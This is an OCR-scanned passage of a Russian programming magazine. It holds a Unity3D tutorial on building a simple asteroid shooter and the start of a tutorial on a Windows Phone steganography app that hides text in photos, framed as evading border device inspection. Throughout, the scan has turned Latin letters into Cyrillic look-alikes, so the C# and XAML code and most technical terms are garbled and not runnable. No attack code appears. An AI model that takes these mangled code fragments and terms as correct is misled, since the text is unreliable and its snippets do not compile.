в него скриптом. К слову сказать, Мопойеѵеіор 
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Рис. 2. Окно настройки осей 

можно заменить на ѴізиаІ Біисііо или любой 
другой редактор в настройках ІІпіІуЗО. 

По умолчанию в скрипте уже существуют 
два пустых метода — БіагіО и ІІрсІаІеО. Метод 
БіагД) вызывается в тот момент, когда объект, 
которому принадлежит скрипт, впервые по- 
является на сцене, а метод ІІрбаІеИ — каждый 
кадр игры. Переопределяемых методов доста- 
точно много, ты можешь посмотреть их в руко- 
водстве на сайте ІІпіІуЗО: Ьі1.Іу/МУ5РсІ0 . 

Метод БіагіО нам не понадобится, так что 
смело стирай его, а вот ІІрсЫеИ пригодится. 
Попробуем с помощью его набросать реакцию 
кораблика на нажатие курсорных клавиш 
влево-вправо. 

В ІІпіІуЗО уже есть готовое решение для ре- 
акции на нажатие популярных в играх клавиш, 
таких как клавиши движения или, например, 
клавиши стрельбы. Давай посмотрим на них. 

В редакторе ІІпіІуЗО пройди в Есііі — > Рго)есІ 
БеШпдз — > ІприБ Раскрой список «Ахез». Нас 
интересует ось Ногігопіаі, потому что кораблик 
должен двигаться только по горизонтальной 
оси (см. рис. 2). 

Как ты видишь, по умолчанию уже заданы 
клавиши влево и вправо, а также дополни- 
тельные клавиши а и б для перемещения 
по горизонтали. Не будем их переопределять, 
оставим все как есть и вернемся в редактор 
кода. 

Для начала определим переменную — 
член класса риЫіс Лоаі зрееб, которая будет 
отвечать за скорость движения кораблика по 
экрану. Важная особенность ІІпіІуЗО — значе- 
ния риЫіс-переменных класса можно задавать 
не только в коде, но и вручную из редактора 




Рис. 1. Рабочее пространство ЦпіІуЗО 
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ІІпіІуЗО прямо в окошке «Іпзресіог», как 
любые другие параметры объекта! Это очень 
удобно для отладки игры, ведь тебе не придет- 
ся каждый раз лезть в код, чтобы подправить 
какие-то параметры. 

После этого в методе ІІрбаІеП напишем: 

Яоаі: тоѵе = Іприі: .6е~ЬАхі5("Ногі2оп1:а1") 

\ 

* зреесі * Тіте.сІеІІіаТіте; 

ігапз-Рогт.Тгапз1а1:е(Ѵес1:огЗ. гі^Иі: * 

тоѵе) ; 

Что мы тут сделали? Все довольно просто. 
Метод Іприі. СеіАхізГ'НопгопІаГ) возвра- 
щаетзначение от — 1 до 1, если мы нажали 
на одну из установленных клавиш пере- 
мещения по горизонтальной оси (отрица- 
тельное — если нажали влево, положитель- 
ное — вправо). Это значение мы умножаем на 
скорость перемещения кораблика, которое 
мы зададим в редакторе, и на загадочное 
Тіте.беІІаТіте — время в секундах, которое 
потребовалось для завершения последнего 
кадра. Умножая на это значение, мы как бы 
говорим «я хочу переместить объект на такое- 
то расстояние за секунду, а не за кадр». Суть 
^ в том, что при разном РР5 скорость движения 
у нас будет одинаковая. Функция Тгапзіаіе 
перемещает объект в заданном направлении. 
Нужно оговориться, что каждый скрипт по 
* умолчанию работает со свойствами того объ- 

екта, на который он повешен. Таким образом, 
написав «ІгапзІогт.ТгапзІаІеІѴесІогЗ.гідЫ * 
тоѵе);», мы говорим ІІпіІуЗО, что хотим пере- 
местить именно этот объект, и никакой другой. 
Для наглядности этот вызов можно расписать 
вот так: 

іііііб .^ атеОЬіесІі.Іігапз-Еопті.ТгапзІаІіе \ 

(УесЕогЗ . гі^Ы: * тоѵе); 

0атеОЬ)есІ — базовый класс в ІІпіІуЗО. 
Любой объект на сцене является объектом 
класса 6атеОЬ)есІ. 

Тип ѴесІогЗ — структура, описывающая 
векторы и точки в пространстве. В данном слу- 
чае мы обращаемся к зіаііс-переменной гідЫ, 
которая описывает вектор, направленный 
вправо в координатах ІІпіІуЗО. Вместо ѴесІогЗ. 
гідЫ можно было написать пеѵѵ ѴесІогЗЦ, 0, 0), 
но ведь первый вариант красивее, правда? :) 

Таким образом мы получаем плавное 
перемещение кораблика по экрану. Но наш 
кораблик уходит за границы экрана! Нужно 
сделать ограничитель. В редакторе ІІпіІуЗО 
передвинем кораблик сначала к левой, а затем 
к правой границе экрана. Полученные коорди- 
наты по оси X на обеих границах экрана и будут 
те координаты, дальше которых мы ограничим 
его движение. Допишем в методе ІІрсІаІеП: 

ІТ (Іігапз-Рогт. розііііоп ,х <= - ) \ 

Іігапз-Рогт. розііііоп = пеш 

УесЕогЗС- . Іігапз-Рогт.розііііоп. у. 

ТгапзТогт. розііііоп , 2 .) ; 

еізе ІТ (Іігапз-Рогт.розііііоп.х >= ) \ 



Іігапз-Рогт. розііііоп = пеш 

ѴесіогЗС.. . Іігапз-Рогт. розііііоп .у. 
Іігапз-Рогт.розііііоп. т .) ; 

Тут все ясно. Если кораблик выходит за 
заданную границу — возвращаем его на эту 
самую границу, дальше — ни-ни! Розіііоп име- 
етуже знакомый нам тип ѴесІогЗ и описывает 
положение объекта в пространстве, через него 
можно получить положение объекта по отдель- 
ным осям — х, у и г, но нужно учитывать, что 
эти значения только для чтения, изменить их 
нельзя. Новое местоположение можно задать 
только через ѴесІогЗ, что мы и сделали. 

Теперь ты можешь нажать на РІау и по- 
двигать кораблик по экрану. 



ПРЕФАБЫ 



Перейдем к важной и нужной теме, а именно 
к созданию префабов. Что такое префаб? Это 
заранее заготовленный игровой объект, кото- 
рый мы можем создать на сцене из кода или 
перетащив на сцену из «Рго)есІ». Мы будем 
использовать префабы для создания снарядов. 
Ведь все снаряды одинаковые, и в процессе 
игры их будет нужно много. 

Создадим на сцене примитив Сарзиіе, ведь 
ты уже умеешь создавать примитивы :). 

Переименуем его в Рго)есІіІе, подвесим над 
нашим кубом-кораблем и на глаз поменяем 
ему размеры так, чтобы по отношению к кора- 
блю он был похож на снаряд. Обрати внима- 
ние на координату 1 у будущего снаряда. Мы 
делаем двумерную игру и потому не исполь- 
зуем третье измерение, так что у всех наших 
объектов координата 1 должна быть одна и та 
же, в нашем случае это 0. 

Как только мы настроили размеры и по- 
ложение нашего снаряда, можно приступать к 
созданию префаба. В «Рго)есІ» создадим ІЧеѵѵ 
РгеІаЬ, назовем его так же — Ргоіесіііе — и 
просто перетащим из «НіегагсЬу» наш объ- 
ект Рго)есІіІе в только что созданный префаб 
Рго)есІіІе в «Рго)есІ». Все! Кстати, объект из 
«НіегагсЬу» можешь удалять, он нам больше не 
понадобится. 

Теперь самое интересное: скажем на- 
шему движку, что снаряд — твердое тело. 

Нам это будет нужно для отрабатывания 
взаимодействия снаряда с астероидами. 

Для этого выделим префаб снаряда, а затем 
пройдем Сотропепіз — > РЬузісз — > РідібЬосІу. 

В инспекторе у префаба-снаряда появился 
новый модификатор РідібЬосІу со своими 
свойствами. В свойствах снимем галку с ІІзе 
бгаѵііу. Это свойство говорит движку ІІпіІуЗО, 
что встроенная гравитация, направленная 
вниз по оси У, на этот объект действовать не 
будет. Также необходимо установить галочку 
около свойства Із Кіпетаііс. Этим мы говорим 
движку, что отныне на объект не будут дей- 
ствовать сторонние силы, и он не будет отра- 
батывать столкновения с другими объектами. 

Теперь создадим новый скрипт для снаря- 
да, это ты тоже уже умеешь :). Сразу же по- 
весим его на наш префаб. В скрипте Рго)есІіІе 
пишем: 



риЬІіс Поаі: зреесі; 

ѵоісі Црсіаііе О -Г 

Яоаі: тоѵе = іііііб . зреесі * \ 

Тіте.сІеРЬаТіте; 

Іігапз-Гогт.ТгапзІаІіеГѴесІіогЗ.ир * 

тоѵе); 

I 

Здесь мы задаем движение снаряда 
аналогично движению корабля, но на этот раз 
движение не зависит от нажатия курсорных 
кнопок и направлено оно вверх. 

А в скрипте РІауегБсгірІ в метод ІІрсІаІеО 
добавим создание снаряда по нажатию клави- 
ши пробела: 

іТ (Іприі:. 6е1= Кеу Роып ( асе* 1 V У_ { 

УесЕогЗ розііііоп = пеш \ 

Ѵесііог 3(1: гапзТогт. розііііоп. х. 

Іігапз-Рогт.розііііоп.у + 

Іігапз-Рогт.розііііоп.г^ ; 

ІпзІіапІііаІіебРгоіесІііІеРге-РаЬ. \ 

розііііоп . Оиаііеппіоп . ісіепіііііу ) ; 

Также в скрипт РІауегЗсгірІ добавим риЫіс- 
переменную типа (ЗатеОЬ)есІ, куда в редакто- 
ре перенесем префаб снаряда: 

риЬІіс (НатеОЬдесЕ РгодесііІеРге-РаЬ ; 

Давай разберемся в том, что происходит 
в скрипте. Каждый кадр проверяется, не на- 
жата ли кнопка пробела, то есть не нажал ли 
игрок «огонь». Как только это происходит, мы 
задаем координаты снаряда. За основу берем 
текущее положение кораблика (помнишь 
про 1Ыз.датеОЬ)ес1?) и по оси У прибавляем 
единичку, чтобы снаряд появлялся не внутри 
корабля, а над ним. После чего функцией 
Іпзіапііаіе инстанциируем (создаем) копию 
снаряда. У Іпзіапііаіе три параметра. Пер- 
вый показывает, какой ЗатеОЬ)есІ мы хотим 
инстанциировать. В нашем случае это префаб 
снаряда. Второй — позицию, где мы хотим его 
инстанциировать. Задается она все тем же 
ѴесІогЗ. Ну а третий параметр — вращение. Мы 
не хотим поворачивать снаряд при создании, 
так что указываем Оиаігепіоп.ісіепіііу, которое 
соответствует нулевому вращению. 

Теперь, запустив игрушку и понажимав 
пробел, ты увидишь, как наш кораблик стреля- 
ет снарядами вверх. 

Последнее дополнение. В целях опти- 
мизации игрушки можно сделать так, чтобы 
снаряды, улетающие за верхнюю границу 
экрана, уничтожались. Это можно сделать по 
аналогии с ограничением движения корабля, 
которое мы делали выше, только на этот раз 
при пересечении границы снарядом нужно вы- 
зывать функцию «ОезІгоу(іЫз.датеОЬ)есі);», 
которая уничтожает объект. Подробно на этом 
останавливаться не буду, тут и так все ясно. 



СОЗДАЕМ АСТЕРОИДЫ 



Самое время добавить врагов — астероиды. 

Создай на сцене сферу (Сате 0Ь)есІ5 — > 
Сгеаіе ОіЬег — ► ЗрЬеге) и настрой ее размеры 
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Пишем игры на коленке 




Рис. 3. Общий вид проекта 

и материал по желанию — прояви свои творче- 
ские способности! 

Разберемся со скриптом для астероидов. 
Астероиды должны появляться в самом верху 
экрана в случайном месте по оси X и лететь 
вниз со случайной скоростью. Вот как это вы- 
глядит в коде: 

риЬІіс Ріоаі: МіпБреесІ; 

риЬІіс Ріоаі: МахБреесІ: 

ргіѵаііе Ріоаі: сиггепіБреесІ ; 

ргіѵаііе Ріоаі: х; 



ѵоісі 5~ЕагЕ() { 

БеіРозіііопАпсІБреесІП ; 

} 



ѵоісі ЦрсІаіеГ) { 

Ріоаі: апгЕТоМоѵе = сиггепіБреесІ * \ 

Тіте.сІеІІіаТіте; 

ігапз-Рогт.ТгапзІаіеРѴесіогЗ.сІоіл/п * \ 
апгЕТоМоуе’) ; 



і-р (ігапз-Рогт.розіііоп.ѵ <= - ) { 

ЗеіРозіііопАпсІБреесЮ ; 

_Л 

1 



риЬІіс ѵоісі БеіРозіііопАпсІБреесЮ { 

сиггепіБреесІ = Капсіот. Кап%е(Міп5реесІ . \ 

МахБреесП : 

х = Капсіот. Кап^еР- . ) ; 



ігапз-Рогт. розіііоп = пеш ѴесіогЗРхЛ 



Хитрость заключается в том, что в нашем 
игровом мире будет всего один астероид, кото- 
рый, дойдя до низа экрана или встретившись 
с кораблем или снарядом, будет возвращаться 
на исходную позицию сверху и снова двигаться 
вниз уже с другой скоростью. 



С методом ІІрсІаІеП все предельно ясно, так 
что на нем останавливаться не будем, а пере- 
йдем сразу к написанному нами методу риЬІіс 
ѵоісі 5еіРозіІіопАпсІ5реесІ(). Метод имеет моди- 
фикатор доступа риЬІіс, а значит, его можно 
будет вызывать и из других скриптов игры. 

В нем высчитывается случайная скорость 
для астероида, и в этом нам помогает класс 
Рапбот. Поскольку меняется только положе- 
ние астероида по оси X, остальные координа- 
ты мы задаем вручную, после чего перемеща- 
ем астероид в новую позицию, используя уже 
знакомое нам свойство ІгапзРогт.розіІіоп. 

Как видишь, метод риЬІіс ѵоісі 
5еіРозі1іопАпсІ5реесІ() вызывается при созда- 
нии объекта астероида, в нашем случае при 
старте игры, так как астероид уже присут- 
ствует в сцене, и каждый раз, когда астероид 
улетаетза нижнюю границу экрана. 

Зададим в редакторе ІІпіІуЗО в свойствах 
астероида в «Іпзресіог» минимальную и 
максимальную скорость с помощью риЫіс- 
переменных скрипта (например, 5 и 10) и 
запустим игру. 

Ура! Астероиды теперь падают, а некото- 
рые даже врезаются в корабль, но ничего не 
происходит. Также ничего не происходит, если 
попасть снарядом по одному из них. Давай 
начнем это исправлять. 



СТОЛКНОВЕНИЯ И ТРИГГЕРЫ 



Для начала в свойствах объекта Азіегоісі, в 
разделе «БрЬеге СоІІібег», поставим галочку 
Із Тгіддег. Далее в инспекторе, в самом верху, 
найдем выпадающий список «Тад» и выбе- 
рем в нем АсИ Іад. Развернем список «Тад» и 
добавим новый тег — епету. Теги нужны для 
того, чтобы различать объекты в игровом мире 
из скриптов и обрабатывать каждый из них 
определенным образом. 

Свойство Із Тгіддег означает, что теперь 
коллайдер объекта (то, чем объект взаимо- 
действует с другими объектами в игровом 

і 



мире) стал триггером. Сейчас коллайдер по 
форме совпадает с самим объектом-асте- 
роидом, то есть сферой, так что условно их 
можно считать одним и тем же. Таким образом, 
если в коллайдер объекта-триггера попадает 
какое-то твердое тело (объект с модифика- 
тором РідібЬобу), в скрипте объекта-триггера 
вызывается метод ѵоісі 0пТгіддегЕп1ег(СоІІісІег 
оіЬег), если он, конечно, не пустой. Передава- 
емый параметр оіЬег — это тот коллайдер, или 
объект, который вошел во взаимодействие с 
объектом -триггером. 

Давай в скрипте Рго)ес1іІе напишем метод, 
который отрабатывает встречу снаряда с 
астероидом: 

ѵоісі ОпТгі^егЕпіегРСоІІісІег оіЬег^ I 

і-р (оіЬег.Ііа^ == )_Л 

АзіегоісІ епету = (АзіегоісПоіІіег . \ 
^атеОЬіес1=.6е1=Сотропеп1= 

—I ; 

епетѵ.БеіРозіііопАпсІБреесІО ; 

Ре5ігоу(іЬІ5.§атеОЬдес1:) ; 

ш 

} 

Сначала мы проверяем тег объекта, 
с которым встретился снаряд. Если это 
астероид с тегом епету — тогда с помощью 
ЗеРСотропепД) мы получаем доступ к скрип- 
ту Азіегоісі, чтобы вызвать риЫіс-метод 
«БеіРозіІіопАпсІБреесіП;», который переместит 
астероид в исходную позицию. После этого мы 
удаляем снаряд со сцены функцией ОезІгоуИ, 
он нам больше не нужен (мы вызываем 
ОезІгоуП из скрипта снаряда, так что, переда- 
вая ей параметр іЬіз.да теОЬ)есі, мы удаляем 
именно снаряд). 

Запусти игру и попробуй пострелять 
по астероидам. При попадании снаряда асте- 
роид исчезает, а в самом верху экрана появля- 
ется новый. Идея на будущее — можно создать 
эффект взрыва при попадании снаряда в асте- 
роид. Подробно на этом мы останавливаться 
не будем, я лишь вкратце расскажу, как это 
можно сделать. В ІІпіІуЗО есть замечательные 
объекты — системы частиц. С их помощью 
можно делать красивые взрывы, россыпи 
чего-либо и прочие подобные эффекты. До- 
статочно добавить на сцену систему частиц, 
красиво ее настроить, создать для нее префаб 
и в функции ѵоісі 0пТгіддегЕп1ег(СоІІісІег оіЬег), 
которую мы только что написали, инстан- 
циировать префаб в нужной точке. Нужная 
точка — это текущее положение снаряда, его 
получить не составит труда. 

Наша игра почти готова, осталось добавить 
реакцию на попадание астероида в кораблик 
(см. рис. 3). Допишем в скрипт РІауегБсгірІ уже 
знакомую функцию ѵоісі 0пТгіддегЕп1ег(СоІІісІег 
оіЬег), она будет поразительно похожа на 
функцию, которую мы писали для снаряда, 
только с небольшими изменениями — мы не 
будем убивать наш кораблик: 

ѵоісі ОпТгі^егЕпіегЧСоІІісІег оіІіегО { 
і-р (оібег .іа§ == у &&&& 
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В СВОЙСТВАХ КІ6ШВ00Ѵ КОРАБЛЯ 
ТАКЖЕ УБЕРЕМ ГАЛОЧКУ Ц5Е 6КАѴІТѴ, 
А ІБ КШЕМАТІС — ПОСТАВИМ 
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Рис. 4. Наша игра в действии Рис. 5. Окно настроек камеры 



Азііегоісі епешу = (АзІіепоісПоІіІіег . \ 
^атеОЬ^есІі.беІіСотропепІ: 

епетѵ.$е1:Ро5І1:іопАпсІ$реесІП ; 

1 

| 

Результат можешь посмотреть на рис. 4. 
Также не забудь добавить на кораблик моди- 
фикатор РідібЬобу, чтобы написанный метод 
начал отрабатывать при взаимодействии с 
объектом-триггером. В свойствах РідібЬобу 
корабля также уберем галочку ІІзе бгаѵііу, а Із 
Кіпетаііс — поставим. 



ПАРА СЛОВ 0 6111 



Вроде бы и все? Ан нет. Ну попал в нас астеро- 
ид, что дальше? Правильно, нужно написать, 
что игра закончилась. 

Вот что мы сделаем для этого. Проследуем 
Рііе — ► ВиіІсІ зеШпдз и добавим текущую сцену 
нажатием кнопки «АсІсІ сиггепі». Затем созда- 
дим новую сцену (Рііе — > ІМеѵѵ Зсепе) и сохраним 
ее в папочку «Зсепез» под названием І_озе. 
Перейдем на нее и также добавим ее в «ВиіІсІ 
ЗеШпдз». Как видишь, ей присвоился индекс 
1, а первой сцене — индекс 0. Это значит, что 



при загрузке игры первой загрузится сцена 
с индексом 0, что нам и нужно. 

Создадим новый скрипт — І_озе и сразу 
закинем его на камеру в сцене «І_озе» (да-да, 
камерам тоже можно назначать скрипты!): 

риЬІіс Тех-Еиге ЬаскТех~Еиге; 



ѵоісі ОпеіЛ() { 

61ІІ.РгамТех1:иге(пеы Кес1:( . . Бсгееп. \ 

ыісііііп . Зсгееп. Неі^ІтС) . ЬаскТех- 

1:ипе); 

} 

ОпбІІіП — замечательный переопределяе- 
мый метод, с помощью которого можно выво- 
дить на экран различную информацию. Метод 
ОгаѵѵТехІиге класса 6111 служит для вывода 
на экран текстуры. Ее параметры — квадрат, 
задающий координаты вывода текстуры, — у 
нас это будет весь экран и собственно сама 
текстура. Ее мы задали риЫіс-переменной. 

Самое время проявить свои творческие 
способности. Открой свой любимый графиче- 
ский редактор и накидай картинку, где будет 
написано, что игра закончена, вы неудачник. 
Нарисовал? Отлично, перетащи ее из прово- 
дника прямо в окно «Рго)есІ», а из «Рго)есІ» — 

I 



в риЫіс-переменную ЬаскТехІиге в камере 
(см. рис. 5). Все! Теперь при запуске сцены 
«І_озе» ты увидишь свою картинку. 

Последний штрих. Нам нужно загру- 
жать эту сцену, когда в кораблик попадает 
астероид. Вернемся на сцену «бсепеі», 
откроем скрипт РІауегбсгірІ и в методе ѵоісі 
ОпТгіддегЕпІег(СоІІісІег оіЬег] после строч- 
ки епету.беіРозШопАпсІбреесіП; допишем 
вызов сцены конца игры. Выглядит он так: 
«АррІісаІіоп.І_оасІІ_еѵеІ(1);», где 1 — это индекс 
сцены в «ВиіІсІ беиіпдз», как ты помнишь. 
Теперь при попадании астероида в корабль 
игра заканчивается, о чем нам недвусмыс- 
ленно намекает появляющаяся на экране 
картинка. 

Игра написана! 



ПАРА СЛОВ НАПОСЛЕДОК 



Конечно, это самая примитивная игра, многое 
я не объяснил, например как натягивать сеть 
на объекты, как работать с физикой... Да много 
чего еще! Но в ней рассмотрены все основные 
моменты и особенности разработки игры в 
ІІпіІуЗО, так что, используя полученные зна- 
ния, ты можешь написать уже более интерес- 
ные и продвинутые игры, которые даже можно 
продавать. ПЕ 
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Юрий «уигетЬо» Язев, ведущий программист компании Сепотебатев (ѵѵѵѵѵѵ.рдепот.ги) 



СТЕГАНОГРАФ 



для ѴѴіпсІоѵѵз РГюпе 




ПИШЕМ ПРОГУ ДЛЯ СОКРЫТИЯ 
ИНФОРМАЦИИ В ФОТКАХ ТВОЕГО 
ВИНДОВОГО СМАРТФОНА 

Говорят, что теперь при въезде в США тебя могут попросить показать но- 
утбук и, если там обнаружится шифродиск, тебе придется ввести пароль. 
Правда это или нет — неважно, главное — общий посыл. Большой брат 
становится все более любопытным, и значимость стеганографии воз- 
растает с каждым годом. А что может быть надежнее, чем сделать 
свой мобильный, не сертифицированный ФСТЭК и не одобренный 
товарищем полковником стеганограф? 




кодинг 



ПРОЕКТИРОВАНИЕ 

Поскольку наша прога обещает быть несколько сложнее, чем 
« И е 1 1 о ѵѵогісі», давай определимся, что нам предстоит сделать, 
иными словами — спроектируем приложение. 

Воспользуемся воображением, построим интерфейс, а также об- 
судим предполагаемые проблемы и попытаемся найти их решения. 

Пользовательский интерфейс я представляю себе следующим 
образом: приложение состоит из двух страниц: на первой, началь- 
ной странице расположено текстовое поле для ввода скрываемого 
сообщения, миниатюра итоговой фотографии (изначально пуста), 
список файлов — изображений, находящихся в хранилище. На 
второй расположена область фотозахвата. Чтобы не мудрить с на- 
стройками, все параметры съемки установим в исходном коде, для 
расширения функциональности можешь добавить третью страницу 
с настройками. 

Итак, перепробовав для реализации интерфейса несколь- 
ко различных способов, в том числе с помощью компонентов 
Рапогата и Ріѵоі, я остался ими недоволен. В данном конкретном 
приложении интерфейс лучше сделать двумя обособленными 
страницами. 

Создание фото возложим на аппаратную кнопку. Сразу после 
захвата и получения фото будем скрывать в изображении текст. 

Я решил воспользоваться стеганографическим методом скрытия 
сообщения в шумах изображения. В отличие от более распростра- 
ненного метода наименьшего значащего бита, который, что понято 
из названия, записывает сообщение в наименьшие биты пикселов 
изображения, этот способ менее подвержен потере скрытых дан- 
ных в результате компрессии изображения, используемой различ- 
ными графическими форматами. Когда фото со скрытым сообщени- 
ем будет готово, его надо сохранить в изолированное хранилище. 
Еще надо добавить возможность восстановить сообщение из 
фотографии. Этот процесс будет запускаться при выборе файла из 
списка. Извлеченный текст будет отображаться в текстовом поле, а 
само изображение — в предназначенной для этого области. Кроме 
того, хорошей идеей будет добавление возможности отправки 
фотографии. 

СОЗДАНИЕ ФОТО 

Создать фотоснимок в ѴѴіпсІоѵѵз РЬопе можно по меньшей мере 
двумя способами. Первый — это воспользоваться классом 
СатегаСарІіігеТазк, являющимся так называемым «выбирателем» 
(СЬоозег). В случае его вызова из своего приложения для создания 
снимка предоставляются стандартные средства ѴѴіпсІоѵѵз РЬопе. 
После получения фото оно возвращается вызвавшему прило- 
жению. При этом у нас почти нет возможностей обработки фото 
(можем его разве что сохранить). Кстати, на моем смартфоне класс 
СатегаСарІигеТазк совсем не работает. 

Второй способ намного интереснее. Класс РЬоІоСатега 
предоставляет полный набор средств для управления встроен- 
ной в смартфон камерой. С его помощью можно настроить режим 




вспышки, разрешения итоговой картинки, а также включить или 
выключить автофокус. Кроме того, он представляет удобные 
события, в которые передаются данные отснятой фотографии и/ 
или ее эскиза. Для реализации фотосъемки воспользуемся этим 
классом. 



І_ЕТТНЕ ВАТЛЕ ВЕ6І N ! 

Начнем с чистого листа. Открой Ѵ5 2010, создай новый проект, 
в качестве заготовки выбери ѴѴіпсІоѵѵз Рбопе Арріісаііоп. По про- 
екту на первой странице располагаются элементы управления, 
а именно объекты классов: ТехіВох, Ітаде, ЫзіВох и ВіШоп, без 
учета надписи-заголовка (рис. 1). Чтобы добавить текстовому полю 
возможность распространения текста на несколько строк, измени 
следующие свойства: АссеріРеІигп поставь в Тгие, ТехіѴѴгарріпд — 
в значение ѴѴгар. 

Кнопка «Сделать фото» будет служить для активации стра- 
ницы фотозахвата. Но сначала эту страницу надо создать. Для 
вызова диалога выбора типа создаваемого элемента щелкни на 
пиктограмме «АсІсІ ІЧеѵѵ Кет». Так как при расположении камеры 
горизонтально область обзора расширяется, в таком положении 
фотографировать удобнее, поэтому в появившемся диалоге выбери 
«ѴѴіпсІоѵѵз РЬопе І_апсІ5саре Раде», введи название (РЬоІоСарІиге) 
и щелчком по кнопке «АсИ» заверши диалог. 

Далее активируй редактор ХАМІ_-кода. Удали содержимое теку- 
щей страницы (между тегами бгісі) и вбей туда следующий код: 

<Сапѵаз х:ІМате="Сапѵа5" Ыі(йН= ,І 700 І> \ 

НогІ2оп1:а1А1і§птеп1:= ,, Сеп1:ег ,, Маг§іп="14., 12"> 

<Сапѵаз , Васк§гоипсІ> 

<ѴісІеоВгизІі х : Мате^Рбо1:оѴіеыеп^_/> 

</Сапѵаз . Васк§поипсІ> 

<1:оо1кі1::Се5І:иге5егѵісе.Се5І:игеІІ5І:епеп> 

<1іоо1к±1: ібезІіигеІ-ІБІіепег Рпа^Сотр1еі:есІ= \ 
"ОпОга§Сотр1е1:есГ /> 

</1:оо1кі1::6е5І:ипе5егѵісе.6е5І:игеІІ5І:епег> 

</Сапѵ аз> 

Здесь мы первым делом создаем канву, устанавливая для нее 
желаемые размеры, расположение и отступы. Затем, воспользо- 
вавшись свойством Васкдгои псі, для ее закраски создаем объект 
ѴісІеоВгизЬ (рис. 2). 

Он будет выводить на канву данные из видеопотока. 
Следующим тегом начинается область определения событий на 
жесты, реакцию на которые мы хотим получить в приложении. У 
нас есть только одно желаемое событие, возникающее в конце 
перетаскивания (в нашем случае просто при проведении пальцем 
по экрану). События этой группы находятся в пространстве 
имен Іооікіі, которое устанавливается вместе с ѴѴіпсІоѵѵз РЬопе 
Тооікіі ( зі I ѵегі ід Ы:.сосІер Іех.сот/геІеазез/ѵіеѵѵ/75888 ). Чтобы 
подключить эту либу, добавь ссылку на сборку МісгозоЙ.РЬопе. 




Рис. 1. Начальная страница приложения 



Рис. 2. Фотозахват 
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СопІгоІз.ТооІкіІ.сШ, по умолчанию находящуюся в каталоге с:\ 
Ргодгат Рііез (х86)\МісгозоЙ БОКзМА/іпсІоѵѵз РЬопе\ѵ7.1 \ТооІ кіі\ 
ОсШ\Віп\. После этого в начало ХАМЬфайла добавь подключение 
этой сборки: хтІп5ТооІкіІ= м сІг-пате5расе:Місго50іТ.РЬопе. 
СопІгоІ5;аз5етЫу= М іеговой. РЬопе.СопІгоІз.ТооІкіР'. В результате 
обработки данного события мы вернемся на предыдущую 
страницу с элементами управления. Получается логично: 
пользователь проводит пальцем по экрану, как бы перелистывая 
страницу, и приложение изменяет ее. Но для этого нам надо 
написать обработчик. В С#-код текущей страницы добавь такую 
функцию: 

ргіѵаііе ѵоіеі ОпРга§Сотр1е1:есІ(оЬдес1: вепсіег^ \ 
Рга^СотрІеІіесІбевІіипеЕѵепІіАп^в е) { 

Іібів.Маѵі^аІііопБепѵісе.Маѵі^аІіеСпеы ЦгіГ'/МаіпРа^е. \ 
хаті". ЦгіКіпсІ.КеІа'Ьіѵе)) ; 

В этом коде создается новый уникальный идентификатор, ко- 
торый указывает на страницу МаіпРаде.хатІ. Этот ІІРІ передается 
сервису навигации приложения, который и осуществляет переход. 

Кстати, мы до сих пор не написали обработчик нажатия кнопки 
для перехода на эту страницу, надо это исправить. Вернись на стра- 
ницу МаіпРаде.хатІ, создай обработчик события нажатия на кнопку 
«Сделать фото», добавь в него такую строчку: іЫз.ІЧаѵідаІіопБегѵісе. 
І\ІаѵідаІе(пеѵѵ ІІгіГѴРИоІоСарІиге.хатГ, СІгіКіпсІ.РеІайѵе]);. 

Теперь, чтобы вывести на канву страницы РбоІоСарІиге то, 
что видит камера, надо произвести инициализацию и привязку 
последней. Код для этого довольно громоздкий, публиковать его в 
журнале мне никто не даст :), поэтому смотри исходник в проекте 
на диске, в статье я буду приводить лишь ключевые моменты и 
давать краткие пояснения. 

Первым делом подключи пространство имен МісговоЙ.Оеѵісев, 
в нем находится класс, описывающий объект камеры. В начале 
класса РЬоІоСарІиге добавь объявление переменной — объ- 
екта камеры: РЬоІоСатега туСат;. После обработчика события 
ОпОгадСотрІеІесІ добавь еще два обработчика: ОпІМаѵідаІесІТо 
вызывается в момент, когда страница показывается (становится 
активной), ОпЫаѵідайпдРгот происходит в обратном случае — ког- 
да страница скрывается (становится дизактивной). В первом надо 
произвести инициализацию объектов, пока только камеры: 

гМ^РбоІіоСатега ЛзСатегаТуре5иррог1:есІ(СатегаТуре.Ргітагу) \ 

== Іігие) I 

туСат = пеш М ісгозо-РІі.Реѵісез.РІіоІіоСатегаГСатегаТуре. \ 
Ргітагу) ; 

РИоІіоѴіемег .5е-Е5оигсе(туСаітО ; 

ь_ 

туСат. Іпііііаіігесі += пеш ЕѵепІіНапгіІегчМісгозоТІі.Реѵісез. \ 
Сатепа0репа1:іопСотр1е1:есІЕѵеп1:Ап§5>(туСат_Іпі1:іа1І2есІ) ; 

Сначала происходит проверка: поддерживает ли наш смартфон 
камеру, если да (а как иначе? ѴѴР ставится на смарты с хотя бы 
одной камерой, но проверка должна быть обязательно, мало ли 
какие проблемы), то происходит инициализация ранее объявлен- 
ной переменной — привязка к ней девайса камеры. Следующим 



ЧТО МОЖЕТ БЫТЬ НАДЕЖНЕЕ 
СВОЕГО МОБИЛЬНОГО, 
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ПОЛКОВНИКОМ СТЕГАНОГРАФА? 



действием вывод камеры привязываем к объекту ѴісІеоВгизЬ для 
закраски канвы данными видеопотока. После этого регистрируем 
событие, возникающее при инициализации камеры. В его обра- 
ботчике можно, например, вывести отладочные данные, на первых 
этапах разработки очень нужное дело. 

Во втором добавленном обработчике должна происходить де- 
инициализация объектов (пока только камеры): 

і-р ( туСат != пиіі) { 
туСат. РІ5рове(): 

туСат .Іпі1:іа1І2есІ -= туСат_Іпі1:іа1І2есІ; 

} 

Если камера еще не удалена (если все идет по плану, то так и 
должно быть), тогда надо удалить ее, а также отменить инициали- 
зацию события. В обработчике события инициализации камеры, 
кроме вывода отладочного сообщения, происходит установка 
параметров съемки. Тут мы включаем вспышку: туСат. РІазЬМосІе 
= РІазЬМосІе.Оп; и устанавливаем желаемое разрешение итоговой 
картинки. 

ІЕпитегаЫе<5І2е> гезі-ізі: = туСат. АѵаіІаЬІеКезоІиІііопз ; 
$І 2 е гез; 

гез гезі-ізі:. Е1етеп1:А1:<5І2е>(5); 
туСат. Кезо1и1:іоп = ^е5^ 

Для этого получаем список доступных разрешений. Благодаря 
стандартизации устройств этот список включает всегда одинако- 
вое количество элементов. Выбираем пятый элемент, скрываю- 
щий за собой разрешение 1600 х 1200. Присваиваем его свойству 
камеры. 

Выполнив этот шаг, можешь откомпилировать и проверить 
разрабатываемое приложение. После запуска должна отобразить- 
ся начальная страница, после нажатия кнопки «Создать фото» 
страница сменится на фотозахват, где ты увидишь все, что видит 
